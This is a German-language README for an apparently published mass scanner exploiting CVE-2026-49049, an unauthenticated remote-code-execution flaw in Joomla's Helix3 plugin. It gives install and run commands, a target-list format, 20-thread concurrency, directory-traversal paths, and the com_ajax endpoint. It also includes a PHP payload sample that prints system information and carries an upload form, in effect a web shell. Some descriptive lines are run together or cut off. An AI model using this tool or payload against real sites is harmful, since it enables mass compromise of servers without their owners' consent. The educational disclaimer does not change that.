
Massenscanner für Joomla Helix3 CVE-2026-49049, der PHP-Test-Payloads über com_ajax hochlädt und ausgeführte (RCE) oder rohe PHP-Antworten erkennt.
Massen-Schwachstellenscanner für CVE-2026-49049 – Nicht authentifizierte Remote-Codeausführung im Joomla-Helix3-Framework.
Dieses Tool prüft mehrere Joomla-Websites auf die CVE-2026-49049-Schwachstelle im Helix3-Plugin. Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, beliebigen PHP-Code auf dem Zielserver hochzuladen und auszuführen.
Der Scanner versucht Folgendes:
com_ajax-Endpunkt mit dem helix3-Plugin auszunutzen.requests-Bibliothekpip install requests
🛠 Installation
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py
🚀 Verwendung
python2 cve-2026-49049.py targets.txt
Eingabeformat
Jede Zeile in targets.txt sollte eine Domain oder IP enthalten:
example.com
https://example.com
http://192.168.1.100
Ausgabedateien
Datei Beschreibung results.txt Verwundbare URLs, bei denen die Payload ausgeführt wurde rez.txt URLs, bei denen die Payload hochgeladen, aber nicht ausgeführt wurde (roher PHP-Code)
Beispielausgabe
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================
[*] Loaded 150 targets
[*] Using 20 threads
[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com
============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5
[+] Vulnerable URLs:
https://target.com/tmp_123456.php.json
⚙️ Konfiguration
Sie können die folgenden Variablen im Skript anpassen:
Variable Standard Beschreibung THREADS 20 Anzahl der gleichzeitigen Threads PATHS ['../../../', '../../../../'] Verzeichnis-Traversal-Pfade TIMEOUT 5 HTTP-Request-Timeout RESULT_FILE 'results.txt' Ausgabedatei für verwundbare Websites RAW_RESULT_FILE 'rez.txt' Ausgabedatei für Websites mit rohem PHP-Code
🧠 So funktioniert es
Das Skript sendet eine POST-Anfrage an:
/index.php?option=com_ajax&plugin=helix3&format=json
mit einer Payload, die:
Anschließend prüft es, ob die Datei erreichbar ist und ob der PHP-Code ausgeführt oder nur als Klartext angezeigt wird.
Payload-Beispiel
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>
⚠️ Haftungsausschluss
Dieses Tool dient ausschließlich Bildungs- und autorisierten Testzwecken.
Die unbefugte Verwendung dieses Tools gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Testberechtigung haben, ist illegal. Der Autor ist nicht für Missbrauch oder Schäden verantwortlich, die durch dieses Tool verursacht werden.
Weitere Haftungsausschlüsse: Sie können den Haftungsausschluss auf der Titelseite von Jenderal92 einsehen. Sie können ihn HIER !!! überprüfen.